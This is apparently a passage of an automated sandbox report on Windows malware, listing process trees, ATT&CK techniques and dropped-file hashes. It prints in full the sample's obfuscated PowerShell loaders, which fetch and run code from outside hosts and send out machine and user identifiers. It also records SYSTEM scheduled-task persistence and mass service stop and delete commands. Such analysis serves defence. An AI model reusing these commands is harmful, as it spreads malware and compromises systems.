Win32_ComputerSystemProduct).UUID,(random))-join'*'))
1⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4776
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='727753b00afea107203a693b45e9fd24';$ifp=$env:tmp+'\if.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/if.bin?^^^&EWYCRADZ^^^&00000000-0000-0000-0000-000000000000^^^&CA:9C:65:75:B2:E4');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|P5oWUfl.exe -
  2⤵
  PID:4456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='727753b00afea107203a693b45e9fd24';$ifp=$env:tmp+'\if.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/if.bin?^&EWYCRADZ^&00000000-0000-0000-0000-000000000000^&CA:9C:65:75:B2:E4');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)"
    3⤵
    PID:3424
- - C:\Windows\System32\WindowsPowerShell\v1.0\P5oWUfl.exe
    P5oWUfl.exe -
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    PID:4368
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='dcd9144d509e7c6e1e63ecdd7e50e935';$ifp=$env:tmp+'\m6.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^^^&EWYCRADZ^^^&00000000-0000-0000-0000-000000000000^^^&CA:9C:65:75:B2:E4');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};i`ex(-join[char[]]$con[0..$i]);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'\m6.bin.ori';[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)^^^|Get-Random -Count 100));test1 -PEBytes $bin|P5oWUfl.exe - &cmd /c copy /y %tmp%\m6.bin.ori %tmp%\m6.bin.exe & %tmp%\m6.bin.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='dcd9144d509e7c6e1e63ecdd7e50e935';$ifp=$env:tmp+'\m6.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^&EWYCRADZ^&00000000-0000-0000-0000-000000000000^&CA:9C:65:75:B2:E4');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};i`ex(-join[char[]]$con[0..$i]);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'\m6.bin.ori';[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)^|Get-Random -Count 100));test1 -PEBytes $bin"
    3⤵
    PID:4640
- - C:\Windows\System32\WindowsPowerShell\v1.0\P5oWUfl.exe
    P5oWUfl.exe -
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    PID:4676
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='e04acec7ab98362d87d1c53d84fc4b03';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?^^^&EWYCRADZ^^^&00000000-0000-0000-0000-000000000000^^^&CA:9C:65:75:B2:E4');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|P5oWUfl.exe -
  2⤵
  PID:4596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='e04acec7ab98362d87d1c53d84fc4b03';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?^&EWYCRADZ^&00000000-0000-0000-0000-000000000000^&CA:9C:65:75:B2:E4');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)"
    3⤵
    PID:2584
- - C:\Windows\System32\WindowsPowerShell\v1.0\P5oWUfl.exe
    P5oWUfl.exe -
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    PID:4536
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\2kv423ii\2kv423ii.cmdline"
      4⤵
      PID:4700
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES6CF3.tmp" "c:\Windows\Temp\2kv423ii\CSC597DFA13EE5D41459BE45CD152CB2F.TMP"
        5⤵
        
        PID:1768
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config xWinWpdSrv Start= Disabled
      4⤵
      PID:1976
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop xWinWpdSrv
      4⤵
      PID:1684
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete xWinWpdSrv
      4⤵
      PID:4120
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config SVSHost Start= Disabled
      4⤵
      PID:3876
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop SVSHost
      4⤵
      PID:3068
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete SVSHost
      4⤵
      PID:720
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config "Microsoft Telemetry" Start= Disabled
      4⤵
      PID:1332
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop "Microsoft Telemetry"
      4⤵
      PID:1800
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete "Microsoft Telemetry"
      4⤵
      PID:5024
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config lsass Start= Disabled
      4⤵
      PID:5020
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop lsass
      4⤵
      PID:2720
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete lsass
      4⤵
      PID:2060
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config Microsoft Start= Disabled
      4⤵
      PID:5052
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop Microsoft
      4⤵
      PID:4988
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete Microsoft
      4⤵
      PID:2464
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config system Start= Disabled
      4⤵
      PID:1732
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop system
      4⤵
      PID:184
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete system
      4⤵
      PID:788
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config Oracleupdate Start= Disabled
      4⤵
      PID:4452
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop Oracleupdate
      4⤵
      PID:2900
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete Oracleupdate
      4⤵
      PID:2440
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config CLR Start= Disabled
      4⤵
      PID:2512
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop CLR
      4⤵
      PID:2848
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete CLR
      4⤵
      PID:3528
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config sysmgt Start= Disabled
      4⤵
      PID:1144
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop sysmgt
      4⤵
      PID:4376
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete sysmgt
      4⤵
      PID:2728
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config \gm Start= Disabled
      4⤵
      PID:900
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop \gm
      4⤵
      PID:1324
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete \gm
      4⤵
      PID:1592
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config WmdnPnSN Start= Disabled
      4⤵
      PID:4620
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop WmdnPnSN
      4⤵
      PID:1608
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete WmdnPnSN
      4⤵
      PID:4760
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config Sougoudl Start= Disabled
      4⤵
      PID:2488
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop Sougoudl
      4⤵
      PID:4372
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete Sougoudl
      4⤵
      PID:1404
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config National Start= Disabled
      4⤵
      PID:3672
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop National
      4⤵
      Drops file in System32 directory
      Modifies data under HKEY_USERS
      PID:4408
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete National
      4⤵
      PID:4488
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config Nationaaal Start= Disabled
      4⤵
      PID:4136
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop Nationaaal
      4⤵
      PID:4212
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete Nationaaal
      4⤵
      PID:4832
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config Natimmonal Start= Disabled
      4⤵
      PID:2812
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop Natimmonal
      4⤵
      PID:1396
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete Natimmonal
      4⤵
      PID:4860
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config Nationaloll Start= Disabled
      4⤵
      PID:4616
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop Nationaloll
      4⤵
      PID:4984
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete Nationaloll
      4⤵
      PID:4124
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config Nationalmll Start= Disabled
      4⤵
      PID:396
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop Nationalmll
      4⤵
      PID:1028
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete Nationalmll
      4⤵
      PID:5028
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config Nationalaie Start= Disabled
      4⤵
      PID:3188
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop Nationalaie
      4⤵
      PID:1552
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete Nationalaie
      4⤵
      PID:4972
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config Nationalwpi Start= Disabled
      4⤵
      PID:5108
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop Nationalwpi
      4⤵
      PID:3944
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete Nationalwpi
      4⤵
      PID:2860
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config WinHelp32 Start= Disabled
      4⤵
      PID:5060
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop WinHelp32
      4⤵
      PID:3760
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete WinHelp32
      4⤵
      PID:4020
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config WinHelp64 Start= Disabled
      4⤵
      PID:3320
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop WinHelp64
      4⤵
      PID:4100
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete WinHelp64
      4⤵
      PID:4476
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config Samserver Start= Disabled
      4⤵
      PID:4396
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop Samserver
      4⤵
      PID:2920
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete Samserver
      4⤵
      PID:4652
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config RpcEptManger Start= Disabled
      4⤵
      PID:4648
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop RpcEptManger
      4⤵
      PID:4436
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete RpcEptManger
      4⤵
      PID:4868
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config "NetMsmqActiv Media NVIDIA" Start= Disabled
      4⤵
      PID:5008
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop "NetMsmqActiv Media NVIDIA"
      4⤵
      PID:64
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete "NetMsmqActiv Media NVIDIA"
      4⤵
      PID:4432
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config "Sncryption Media Playeq" Start= Disabled
      4⤵
      PID:4696
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop "Sncryption Media Playeq"
      4⤵
      PID:4312
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete "Sncryption Media Playeq"
      4⤵
      PID:4548
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config SxS Start= Disabled
      4⤵
      PID:724
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop SxS
      4⤵
      PID:4964
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete SxS
      4⤵
      PID:4528
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config WinSvc Start= Disabled
      4⤵
      PID:4420
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop WinSvc
      4⤵
      PID:2712
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete WinSvc
      4⤵
      PID:3832
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config mssecsvc2.1 Start= Disabled
      4⤵
      PID:4700
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop mssecsvc2.1
      4⤵
      PID:2976
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete mssecsvc2.1
      4⤵
      PID:3484
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config mssecsvc2.0 Start= Disabled
      4⤵
      PID:3752
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop mssecsvc2.0
      4⤵
      PID:5036
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete mssecsvc2.0
      4⤵
      PID:5056
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config Windows_Update Start= Disabled
      4⤵
      PID:3948
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop Windows_Update
      4⤵
      PID:5088
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete Windows_Update
      4⤵
      PID:5072
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config "Windows Managers" Start= Disabled
      4⤵
      PID:5020
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop "Windows Managers"
      4⤵
      PID:3188
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete "Windows Managers"
      4⤵
      PID:3528
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config SvcNlauser Start= Disabled
      4⤵
      PID:1592
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop SvcNlauser
      4⤵
      PID:5108
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete SvcNlauser
      4⤵
      PID:2900
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Config WinVaultSvc Start= Disabled
      4⤵
      PID:4120
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Stop WinVaultSvc
      4⤵
      PID:2728
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" Delete WinVaultSvc
      4⤵
      PID:4972
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn t.bb3u9.com /F /tr t.bb3u9.com
  2⤵
  - Creates scheduled task(s)
  PID:4696
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \VypNHClE /F /tr "powershell -c PS_CMD"
  2⤵
  - Creates scheduled task(s)
  PID:1404
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /run /tn \VypNHClE
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:4408

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.bb3'+'u9.com';a($url+'/a.jsp?mail_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
1⤵
PID:4408

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:4260

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.bb3'+'u9.com';a($url+'/a.jsp?rep_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
1⤵
PID:1832

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5
d737fc27bbf2f3bd19d1706af83dbe3f

SHA1
212d219394124968b50769c371121a577d973985

SHA256
b96b55a2acd9c790092e8132b31e5f0110492f98828098112d46f2f9faa2b982

SHA512
974c2db081dd6d1f45763371c41e01173b189ea1a2d893d0bc415670bfa12f3934ba9dea64018b8c063017454d4d92888d6fe6eaad1659e420ba9adcde5e788b

Download Submit
C:\Windows\System32\WindowsPowerShell\v1.0\P5oWUfl.exe

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Windows\System32\WindowsPowerShell\v1.0\P5oWUfl.exe

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Windows\System32\WindowsPowerShell\v1.0\P5oWUfl.exe

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Windows\TEMP\2kv423ii\2kv423ii.dll

MD5
1b1b798cb957d6c0b92efad9944e388c

SHA1
e14d1b6e66e1e059b1164de6473a70a08db57e29

SHA256
de52ea80afe40b956d1fc0a1dc6d95d9a7874764254ea841211d80e9a70e4aa8

SHA512
ca23456f39f746ecf99d58be9acad4cd0463a47b72bfe5c3603a5299d08b7dc24e4501cfbfcef16fd4b1a0d1fa38710ce88faf4010e56cb8685107a3004ca7ba

Download Submit
C:\Windows\TEMP\RES6CF3.tmp

MD5
6e0224b73b3a56a618e428540744ab88

SHA1
16434eb60103ca37ee441c8a040f14f1d43b6beb

SHA256
3350ec26b52d1b995def7f5f27805d920168e805b9f00a93ed311427721fae6a

SHA512
d8572e9eabd0284a2f0238858bd7e9d66a083a3723fbffd73a9e89e76a657f2f0a15d0a210e985a5c0d45dfb38d38b95f80df5492ac2a1d600e87ed004c091a3

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

MD5
8a313b70fd641fc4e6fffb40391d0b4d

SHA1
22684fe19ecd7943ac18e622db0d7f161db500e8

SHA256
bd33eb064e32cf8d9af160e3304d3f0e1b90bdc9ab5116c16ba87d9a14060911

SHA512
5b72cd7e301ad3825bf1465840f52abb885c2481700df5dfa299c30aa6b61613dac8fc1386895cffec48b8229cba77085f672a80e42d7fd07c73eafd962e1246

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5
0f9ce9a5d0a320223c80462d2e228bc7

SHA1
7bbeda6d81d00592083f7e7943912d8e824c92fd

SHA256
887664b1cd8013d5c4917e6a4e1b295e9bc9d15f57eeb8d06801b548e48c42fa

SHA512
45aadffdff25de5a7c02a26637c820761d4e0a0f5b4f5ff88778094df9a72f0f97ae301c59b3f5c780bd1d263b6cd9069c0f50b410f58a8d9783a0b9a4a61676

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5
5f5aa607657efd596f2ba27625bb7ed4

SHA1
6818e799afcb486fa9416eb29468c10f7a051d88

SHA256
f5a8fbb9d69c35df83b4721a580777a6d7f748965b8db902257a73a2d48b787b

SHA512
0b6d87751aaa6da840f932e718d1444e0b7d033f3eecfac988a9b9e4266370d852d7a5f28d65526968807fe56018902c0a6c1ac876a276efce876aebb57fa93b

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5
e7a92029bc87f49a1e4d676ff68d22d4

SHA1
97a15e013180891a957a0f711d2fb0d368e83fe7

SHA256
796a60daadf0ac9af7cc85afa6dcfded5bec0e6a3520d27ef486a75e595ef1e3

SHA512
cc1e74535d9c8edc0f9c2b3b76b78ebfcd0d13c88b70c0266571261f1132fc0c6f371269c8a6e5eed91b574a2b431559420df8ba959d6c71b87f757fe965d576

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5
0d6cf36fd1365f5e0f3613e036e67b08

SHA1
a69cfe08860abf74eeb3061de7e94e078f0e7476

SHA256
